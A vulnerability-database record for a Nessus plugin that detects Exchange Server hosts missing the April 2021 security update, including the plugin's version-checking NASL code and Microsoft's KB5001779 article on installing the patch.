DATABASE RESOURCES PRICING ABOUT US

{"id": "SMB_NT_MS21_APR_EXCHANGE.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Security Updates for Microsoft Exchange Server (April 2021)", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482, CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-33766)", "published": "2021-04-13T00:00:00", "modified": "2023-01-20T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/148476", "reporter": "This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33766", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28481", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28482", "http://www.nessus.org/u?3bdeeea7", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473", "http://www.nessus.org/u?b66291c9", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28483", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28480"], "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "immutableFields": [], "lastseen": "2023-08-11T14:57:41", "viewCount": 129, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:5E39190B-F5C9-4C2C-ABBF-7BAE3C89DB41", "AKB:6F1D646E-2CDB-4382-A212-30728A7DB899", "AKB:84478BB4-7D6D-43CE-8EF1-9CF669B0A51C", "AKB:B86FF102-0FBC-45A5-8D59-B98CA36BFCF9", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0275", "CPAI-2021-0476", "CPAI-2021-0547"]}, {"type": "cisa", "idList": ["CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-33766", "CISA-KEV-CVE-2021-34473", "CISA-KEV-CVE-2021-34523"]}, {"type": "cve", "idList": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-33766", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "githubexploit", "idList": ["0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "2BEFA353-947D-5B41-AE38-EDB0C71B5B44", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "4AC49DB9-A784-561B-BF92-94209310B51B", "89D123FA-BB49-5E95-A104-D2FF0EF561BD", "B1274C64-524E-5AAB-9D50-AC7043563B81", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "E458F533-4B97-51A1-897B-1AF58218F2BF", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F33D3024-CAB5-53F3-9685-6A1E68156853", "F9AE0566-F0C6-57A4-8F79-DD8EB0A3BE64"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F2305684A25C735549865536AA4254BF"]}, {"type": "ics", "idList": ["AA21-321A", "AA22-117A", "AA22-257A", "AA22-321A", "AA23-215A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C"]}, {"type": "kaspersky", "idList": ["KLA12137", "KLA12224"]}, {"type": "krebs", "idList": ["KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:F8A52CE066D12F4E4A9E0128831BF48D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BDB324B2E5CD88570A6B585DB46F717D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "MMPC:42ECD98DCF925DC4063DE66F75FB5433"]}, {"type": "mscve", "idList": ["MS:CVE-2021-28480", "MS:CVE-2021-28481", "MS:CVE-2021-28482", "MS:CVE-2021-28483", "MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-33766", "MS:CVE-2021-33768", "MS:CVE-2021-34470", "MS:CVE-2021-34473", "MS:CVE-2021-34523"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "msrc", "idList": ["MSRC:8F98074A1D86F9B965ADC16597E286ED", "MSRC:C28CD823FBB321014DB6D53A28DA0CD1"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163895"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "QUALYSBLOG:352650F44A686E31669777DBEC831101", "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720"]}, {"type": "securelist", "idList": ["SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "seebug", "idList": ["SSV:99238"]}, {"type": "thn", "idList": ["THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:348286B051EE300B46D60D90A16A5CCB", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:FA40708E1565483D14F9A31FC019FCE1"]}, {"type": "threatpost", "idList": ["THREATPOST:1CEC18436389CF557E4D0F83AE022A53", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4CDF630111B3B270DE5293E66A69D0DE", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:538043C9083F275CEDC19CDCF8E4BC02", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:6382C221240C9EDF8BE17227B3E1A57A", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:7421D8BA8C82C24562A6FF9F690B1DCE", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:9235CC6F1DCCA01B571B8693E5F7B880", "THREATPOST:95C995B2005CA3F4467BC3C69862415E", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:B5F8CA0AF4F98DBE9E38860BC10035DE", "THREATPOST:DC1D0F0CCC185180A765DA70CBE07A9B", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496"]}, {"type": "trellix", "idList": ["TRELLIX:21227249912602DD6E11D3B19898A7FF"]}, {"type": "zdi", "idList": ["ZDI-21-798", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-36585", "1337DAY-ID-36667"]}]}, "score": {"value": 1.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:84478BB4-7D6D-43CE-8EF1-9CF669B0A51C", "AKB:B86FF102-0FBC-45A5-8D59-B98CA36BFCF9", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0275", "CPAI-2021-0476", "CPAI-2021-0547"]}, {"type": "cisa", "idList": ["CISA:8C51810D4AACDCCDBF9D526B4C21660C"]}, {"type": "cve", "idList": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "githubexploit", "idList": ["F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "hivepro", "idList": ["HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74"]}, {"type": "kaspersky", "idList": ["KLA12137", "KLA12224"]}, {"type": "krebs", "idList": ["KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:F8A52CE066D12F4E4A9E0128831BF48D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:BDB324B2E5CD88570A6B585DB46F717D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYSHELL_RCE/", "MSF:ILITIES/MSFT-CVE-2021-28480/"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433"]}, {"type": "mscve", "idList": ["MS:CVE-2021-28480", "MS:CVE-2021-28481", "MS:CVE-2021-28482", "MS:CVE-2021-28483", "MS:CVE-2021-33766", "MS:CVE-2021-34473", "MS:CVE-2021-34523"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433"]}, {"type": "nessus", "idList": ["EXCHANGE_PROXYSHELL.NBIN", "MICROSOFT_EXCHANGE_INSTALLED.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163895"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:352650F44A686E31669777DBEC831101"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16"]}, {"type": "securelist", "idList": ["SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "seebug", "idList": ["SSV:99238"]}, {"type": "thn", "idList": ["THN:348286B051EE300B46D60D90A16A5CCB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:FA40708E1565483D14F9A31FC019FCE1"]}, {"type": "threatpost", "idList": ["THREATPOST:1CEC18436389CF557E4D0F83AE022A53", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4CDF630111B3B270DE5293E66A69D0DE", "THREATPOST:538043C9083F275CEDC19CDCF8E4BC02", "THREATPOST:6382C221240C9EDF8BE17227B3E1A57A", "THREATPOST:7421D8BA8C82C24562A6FF9F690B1DCE", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:9235CC6F1DCCA01B571B8693E5F7B880", "THREATPOST:95C995B2005CA3F4467BC3C69862415E", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:B5F8CA0AF4F98DBE9E38860BC10035DE", "THREATPOST:DC1D0F0CCC185180A765DA70CBE07A9B"]}, {"type": "zdi", "idList": ["ZDI-21-798", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-36585", "1337DAY-ID-36667"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-28480", "epss": 0.21538, "percentile": 0.95713, "modified": "2023-05-07"}, {"cve": "CVE-2021-28481", "epss": 0.01608, "percentile": 0.85494, "modified": "2023-05-07"}, {"cve": "CVE-2021-28482", "epss": 0.0155, "percentile": 0.85212, "modified": "2023-05-07"}, {"cve": "CVE-2021-28483", "epss": 0.00139, "percentile": 0.48158, "modified": "2023-05-07"}, {"cve": "CVE-2021-33766", "epss": 0.91389, "percentile": 0.98361, "modified": "2023-05-07"}, {"cve": "CVE-2021-34473", "epss": 0.97378, "percentile": 0.99834, "modified": "2023-05-07"}, {"cve": "CVE-2021-34523", "epss": 0.9747, "percentile": 0.99935, "modified": "2023-05-07"}], "vulnersScore": 1.0}, "_state": {"dependencies": 1691766858, "score": 1691767296, "epss": 0}, "_internal": {"score_hash": "388ffba2986b724757592a7777641089"}, "pluginID": "148476", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148476);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-28480\",\n \"CVE-2021-28481\",\n \"CVE-2021-28482\",\n \"CVE-2021-28483\",\n \"CVE-2021-33766\",\n \"CVE-2021-34473\",\n \"CVE-2021-34523\"\n );\n script_xref(name:\"MSKB\", value:\"5001779\");\n script_xref(name:\"MSFT\", value:\"MS21-5001779\");\n script_xref(name:\"IAVA\", value:\"2021-A-0160-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0040\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0022\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0021\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482,\n CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to\n gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to\n disclose potentially sensitive information. (CVE-2021-33766)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3bdeeea7\");\n # https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b66291c9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5001779\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34473\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-34523\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.18',\n 'kb': '5001779'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 18,\n 'cu' : 20,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.14',\n 'kb': '5001779'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 18,\n 'cu' : 20,\n 'min_version': '15.01.2242.0',\n 'fixed_version': '15.01.2242.10',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.15',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 9,\n 'min_version': '15.02.858.0',\n 'fixed_version': '15.02.858.12',\n 'kb': '5001779'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS21-05',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/a:microsoft:exchange_server"], "solution": "Microsoft has released the following security updates to address this issue:\n -KB5001779", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2021-34473", "vendor_cvss2": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "Critical", "score": "9.2"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": ["Core Impact", "Metasploit(Microsoft Exchange ProxyShell RCE)"]}

{"mskb": [{"lastseen": "2023-06-23T19:31:39", "description": "None\n**Important: **Please install the May 2021 security update. That update supersedes this security fix. For more information, see the following Exchange Team Blog article:\n\n * [Released: May 2021 Exchange Server Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * This security update rollup resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2021-28480 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28480>)\n * [CVE-2021-28481 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28481>)\n * [CVE-2021-28482 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28482>)\n * [CVE-2021-28483 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28483>)\n * [CVE-2021-34473 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523 | Microsoft Exchange Server Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)\n\n## Known issues in this update\n\n * **Known issue 1** \n \nWhen you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) might stop working. \n \nThis issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.To avoid this issue, follow these steps to manually install this security update.\n\n**Note: **This issue does not occur if you install the update through Microsoft Update.\n\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\n**Notes: **\n * Exchange services might remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition might occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n * When you block third-party cookies in a web browser, you may be continually prompted to trust a particular add-in even though you keep selecting the option to trust it. This issue occurs also in privacy window modes (such as InPrivate mode in Microsoft Edge). This issue occurs because browser restrictions prevent the response from being recorded. To record the response and enable the add-in, you must enable third-party cookies for the domain that's hosting OWA or Office Online Server in the browser settings. To enable this setting, refer to the specific support documentation for the browser.\n * **Known issue 2** \n \nAfter you install the Exchange Server April security update, cmdlets that are run through the Exchange Management Shell by using an invoked runspace might fail and return the following error message: \n\n**Note: **The syntax is not supported by this runspace. This can occur if the runspace is in no-language mode. \n\nFor more information, see [\u201cThe syntax is not supported by this runspace\u201d error after installing April 2021 Exchange security update (or later updates)](<https://support.microsoft.com/en-us/topic/-the-syntax-is-not-supported-by-this-runspace-error-after-installing-april-2021-exchange-security-update-ac2d4e97-62f6-4ad4-9dbb-0ade9b79f599>)\n * **Known issue 3** \n \nRequesting free/busy information for a user in a different forest in a trusted cross-forest topology might fail and return the following Autodiscover error message: \n\n**Note: **The remote server returned an error: (400) Bad Request.\n\nFor more information, see [\"(400) Bad Request\" error during Autodiscover for per-user free/busy in a trusted cross-forest topology](<https://support.microsoft.com/en-us/topic/-400-bad-request-error-during-autodiscover-for-per-user-free-busy-in-a-trusted-cross-forest-topology-a1d6296b-1b2b-4ecd-9ab6-d8637fe20a21>)\n * **Known issue 4** \n \nAdministrator or Service accounts that end in a dollar sign character ($) might fail when they try to connect to Exchange Management Shell or EAC. The only workaround at this time is to use accounts that don't have a dollar sign at the end of the name.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5001779>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * [Download Security Update For Exchange Server 2019 Cumulative Update 9 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=5aa2aaf7-860d-4977-acd4-82096c83c5f0>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 8 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=93809dc0-0265-4116-bc51-510ce641008b>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 20 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=b13f23a9-5603-4b13-8e16-6d35b5b33524>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 19 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=52da6d67-e0c4-4af0-a133-1e47217b6309>)\n * [Download Security Update For Exchange Server 2013 Cumulative Update 23 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=f827ff3b-194c-4470-aa8f-6cedc0d95d07>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: April 13, 2021](<https://support.microsoft.com/help/5001866>).\n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 (KB5000871)](<https://support.microsoft.com/help/5000871>)\n\n## File information\n\n### File hash information\n\nUpdate name| File name| | SHA1 hash| SHA256 hash \n---|---|---|---|--- \nExchange Server 2019 Cumulative Update 9| Exchange2019-KB5001779-x64-en.msp| | 6BF217B876381DB769BA8D4EF8FE2F1739841BDE| 557245D2B52C708A193DAAB46D35CA1683DCF1F651CC362B53DC6D7CAEB0E2F9 \nExchange Server 2019 Cumulative Update 8| Exchange2019-KB5001779-x64-en.msp| | B228041E258836DCC03B16B485DC7AA4FDDE7DC0| 58DC3AEA33E5014BCE03FC905FA59332B5C1E673F9195C646AF5F1541E33AF87 \nExchange Server 2016 Cumulative Update 20| Exchange2016-KB5001779-x64-en.msp| | 6481BC6EE060541641EE21F0368F45563C03CFD8| F428F4F667539E1D7D2F7FC5A526E699D86718990622F8724E0258F4B4107518 \nExchange Server 2016 Cumulative Update 19| Exchange2016-KB5001779-x64-en.msp| | 0368F19923C70B1824297FD333D056B5CB20AF37| 7A2DF56EC99A6DF13258360DF79C01713C19AA0D35A33FB1FC8DC2CB12669123 \nExchange Server 2013 Cumulative Update 23| Exchange2013-KB5001779-x64-en.msp| | CC0DAAE493A268E495CA7B547CB1EA2A5A7A0556| 2987759DFEDA4A2E7FCEC234938E1629A288D097E585BAAEEF40C5982DFE709A \n \n### Exchange server file information\n\nThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 